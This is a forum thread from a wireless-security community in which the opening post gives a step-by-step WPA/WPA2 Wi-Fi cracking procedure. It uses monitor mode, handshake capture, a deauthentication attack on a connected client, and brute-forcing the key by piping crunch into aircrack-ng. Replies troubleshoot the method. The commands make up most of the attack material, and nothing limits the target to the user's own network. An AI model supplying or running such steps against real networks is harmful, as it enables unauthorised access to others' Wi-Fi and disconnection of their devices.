Crunch & Aircrack-ng to Avoid Wordlists

Discussion in 'Dictionary, Password & Wordlists' started by mrmanuelmtz, 29 Aug 2012.

  1. mrmanuelmtz

    mrmanuelmtz Well-Known Member

    Joined:
    20 Jul 2012
    Messages:
    11
    Likes Received:
    32
    Trophy Points:
    73
    Well, this post is because I am tired of these dictionary files that are constantly increasing in size, to the point where they cease to be portable, so instead of buy a higher capacity USB memory. I decided to do some research and I think this is a great option to use as a last resort as this is a brute force method.

    so as the post says. the programs to use are the aircrack-ng suite and crunch

    That said... :dance

    first we put our wireless card on monitor mode: (open Root Shell Window)
    Code:
    Select All
    airmon-ng start wlan0 airodump-ng mon0, (or ath1, or ...)
    Other Linux 2.4.x kernel-2012-08-24-00-39-01.png
    • the card will start listen to networks, wait 'till your essid appear which has to be WPA or WPA2 encoded
    Other Linux 2.4.x kernel-2012-08-24-00-39-40.png
    • mine is INFINITUMCBA277 so select yours
    • now that you have the MAC address and the ch#
    Code:
    Select All
    airodump-ng -c CH# --bssid 'YOURMACADDRESS' -w ESSID mon0
    • it should look like this:
    Code:
    Select All
    airodump-ng -c 6 --bssid 58:98:35:CB:A2:77 -w INFINITUMCBA277 mon0
    Other Linux 2.4.x kernel-2012-08-24-00-51-02.png
    • so now we wait forever for a handshake or we can deauthenticate a client to obtain a handshake
    • in order to do that we must have the MAC of the client:
    Code:
    Select All
    aireplay-ng -0 10 -a 'YOURMACADDRESS' -c 'CLIENTSMACADDRESS' mon0
    • it should look like this:
    Code:
    Select All
    aireplay-ng -0 10 -a 58:98:35:CB:A2:77 -c 70: D4:F2:91:AE:67 mon0
    Other Linux 2.4.x kernel-2012-08-24-00-56-27.png
    • once the user is deauthenticated and reconnect we'll obtain the handshake
    • if the command didn't work, well... try again (if after u did the deauthenticate command noting seems to happend... maybe you are too far from the client 'cause this command goes directly to the client's connection.) :(
    • you will see something like: WPA handshake 58:98:35:CB:A2:77
    Other Linux 2.4.x kernel-2012-08-24-18-09-34.png
    • so now we use crunch
    • we wil use the *.cap file were the handshake was saved
    Other Linux 2.4.x kernel-2012-08-24-18-35-12.png
    • usually in Xiaopan OS is in /home/tc/
    • so the syntaxis is:
    Code:
    Select All
    crunch 8 8 0123456789 | aircrack-ng -a 2 'HOME-TC-FILE-CAP' -e 'ESSID' -b 'HANDSHAKE' -w -
    • it should look like this:
    Code:
    Select All
    crunch 8 8 0123456789 | aircrack-ng -a 2 /home/tc/INFINITUMCBA277-02.cap -e INFINITUMCBA277 -b 58:98:35:CB:A2:77 -w -
    Other Linux 2.4.x kernel-2012-08-24-20-04-15.png
    Then you just have to wait for crunch and aircrack-ng to verify each combination.

    i highlight the last command because i want to explain it so you can adapt the program to your needs:

    Code:
    Select All
    crunch 8 8 0123456789 | aircrack-ng -a 2 /home/tc/INFINITUMCBA277-02.cap -e INFINITUMCBA277 -b 58:98:35:CB:A2:77 -w -
    • So we start with the first instruction: crunch is the wordlist generator :pcrunch 8 8
      • crunch 8 8
    • Second: the '8 8' is for the length of the word in characters, the first '8' indicates starting length and the second '8' the ending length. So if you want to test your security with 16 characters password you can change to '16 16,' or '8 16.'
      • crunch 8 8 0123456789
    • Third: '0123456789' this is the list of characters to include in the wordlist for a numeric password. note: 75 % of users use numeric passwords. but you can also try something like: '01234567890abcdefghijklf' by using an alphanumeric wordlist the time will increase as this is a brute force method.
      • 0123456789 | aircrack-ng
    • Fourth: this symbol is very important --> | <-- as it indicates the end of instructions for crunch and the new instructions for aircrack-ng.
    • Last but not least: the place were the .cap file is has to be accurate :idea
    Well there's a lot of program that do things like this, i just like it better to do it by myself :D. Well this is it, let me know if you find this post useful :dance
     
    • Like Like x 15
    • Informative Informative x 4
    • Winner Winner x 1
  2. Mr. Penguin

    Mr. Penguin Administrator
    Staff Member Admin Moderator VIP

    Joined:
    18 May 2012
    Messages:
    3,087
    Likes Received:
    1,186
    Trophy Points:
    351
    Really impressive, I think that this would interest hazz death quite a lot.
     
    • Like Like x 1
    • Agree Agree x 1
  3. hazz death

    hazz death Well-Known Member
    Dev Team VIP

    Joined:
    19 Jun 2012
    Messages:
    101
    Likes Received:
    85
    Trophy Points:
    88
    thanks for tagging me, yes, it realy impressive! :D thanks for sharing mrmanuelmtz
     
  4. ihack

    ihack Member

    Joined:
    8 Oct 2012
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    16
    Just curios the the wifi that i was trying to crack had CCMP cipher, so my question is if it is possible to crack a network with a CCMP cipher using the above method or does it have to be a WEP or TKIP cipher
     
  5. mrmanuelmtz

    mrmanuelmtz Well-Known Member

    Joined:
    20 Jul 2012
    Messages:
    11
    Likes Received:
    32
    Trophy Points:
    73

    Well this method is for wpa/wpa2 networks so CCMP cipher is still a wpa/wpa2, just remember that this method is a bruteforce so if you are looking forward to have a more secure network, if your router supports it, set it to
    only beacon once a second - that should
    deter anyone trying to Bruteforce.
     
  6. easy1

    easy1 Member

    Joined:
    8 Oct 2012
    Messages:
    11
    Likes Received:
    1
    Trophy Points:
    18
     
  7. nonameinthenet

    Joined:
    15 Oct 2012
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    6
    Thanks 4 d guide., ill try this..
     
  8. vampiricbunny1800

    vampiricbunny1800 Well-Known Member
    Dev Team VIP

    Joined:
    8 Oct 2012
    Messages:
    242
    Likes Received:
    64
    Trophy Points:
    63
    let me see if i am on the same page... when u look and say crunch and type the letters it makes the list for? so crunch 8 8 abc
    will make a 8 letter word only useing those 3 letters ? or did i mis read something
     
  9. ImJoJo

    ImJoJo The One & Only
    VIP

    Joined:
    25 Jun 2012
    Messages:
    246
    Likes Received:
    107
    Trophy Points:
    191
  10. vampiricbunny1800

    vampiricbunny1800 Well-Known Member
    Dev Team VIP

    Joined:
    8 Oct 2012
    Messages:
    242
    Likes Received:
    64
    Trophy Points:
    63
    how fast is this the same as a dic file or faster? i am currently hashing a 40 gig file ... i have another 27 gig dic file... if this is faster i much pref this also can you do a bt (gnome) walkthough on it or is it the same thing
     
  11. mrmanuelmtz

    mrmanuelmtz Well-Known Member

    Joined:
    20 Jul 2012
    Messages:
    11
    Likes Received:
    32
    Trophy Points:
    73
    :yes A= yes that's exactly how it works, but for a 3 letters combination u don't need a program :)
     
  12. tuyhin

    tuyhin Member

    Joined:
    30 Aug 2012
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    6
    how to type --> | <--
     
  13. vampiricbunny1800

    vampiricbunny1800 Well-Known Member
    Dev Team VIP

    Joined:
    8 Oct 2012
    Messages:
    242
    Likes Received:
    64
    Trophy Points:
    63
    thank you that was informative i will try that later i will have to do all letters and numbers tho XD i have a HUGE password
    --- Double Post Merged, 19 Nov 2012 ---
    @ mrmanuelmtz, alt+179 = │
     
  14. estimacamry

    estimacamry Tracker
    VIP

    Joined:
    3 Aug 2012
    Messages:
    552
    Likes Received:
    131
    Trophy Points:
    91
    Guys,
    I manage to create word list with Crunch. My pass phrase abkcmtshab. In order to shorten my pentest time I use
    /pentest/passwords/crunch/./crunch 10 10 abchkmst -t abkc@@@@@@ -o <name.txt>
    The lists is only 1mb. After 4way handshake started aircrack. Final results : Passphrase not in dictionary!
    How could this be? I've double check to make sure abkcmtshab is in my txt file before starting aircrack. Anyone care to explain:(
    Problem solved after running wpaclean on my cap file:joy
     
  15. x_mony

    x_mony Guest

    Hi mrmanuelmtz i like your idea of crunch and aircrack instead of wordlist but i'm not knowing when are you opening a new root shell each time can u specify me when do you open a new root shell? And where should the handshake appear please specify this to me also.and hey thanks very much in advance
     
  16. ImJoJo

    ImJoJo The One & Only
    VIP

    Joined:
    25 Jun 2012
    Messages:
    246
    Likes Received:
    107
    Trophy Points:
    191
    | is on top of "enter" key under "backspace" key same key where \ backslash is at..shift + \ will give you |
     
  17. x_mony

    x_mony Guest

    Aircrack started trying the pins and everything worked fine but when the current passphrase reached the same numbers as my password nothing happened and it continued trying combination
    --- Double Post Merged, 12 Dec 2012 ---
    Hi mrmanuelmtz your method worked with my ralink just wondering does it work with the built in wifi of the laptop?thanks in advance
     
  18. estimacamry

    estimacamry Tracker
    VIP

    Joined:
    3 Aug 2012
    Messages:
    552
    Likes Received:
    131
    Trophy Points:
    91
    x_mony
    Clean up your cap file before starting aircrack
    Code:
    Select All
    wpaclean <out.cap> <in.cap>
     
  19. x_mony

    x_mony Guest

    thnx for the reply
    --- Double Post Merged, 9 Jan 2013 ---
    hi mrmanuelmtz said :"Well there's a lot of program that do things like this, i just like it better to do it by myself :D."does anyone know a program that uses crunch and aircrack-ng automatically without the need of writing all these commands? and thanks in advance
     
  20. epitomize

    epitomize Active Member

    Joined:
    26 Oct 2012
    Messages:
    9
    Likes Received:
    3
    Trophy Points:
    33
    can put the crunch on minidwep?.. ~_~




    { hoho }
     
    • Like Like x 2
Loading...
  • About Us

    We are a community mixed with professionals and beginners with an interest in wireless security, auditing and pentesting. Feel free to check out and upload resources.


    You can also find us on: Twitter and Facebook

  • Donate to Us

    Did you find our forums useful? Feel free to donate Bitcoin to us using the form below. Those who donate the equivlent of $10 USD or more will be upgraded to VIP membership. Don't have Bitcoin? Use your credit card to GO VIP here. Don't want to fork out some coin? There are other ways to GO VIP. Bitcoin: 1LMTGSoTyJWXuy2mQkHfgMzD7ez74x1Z8K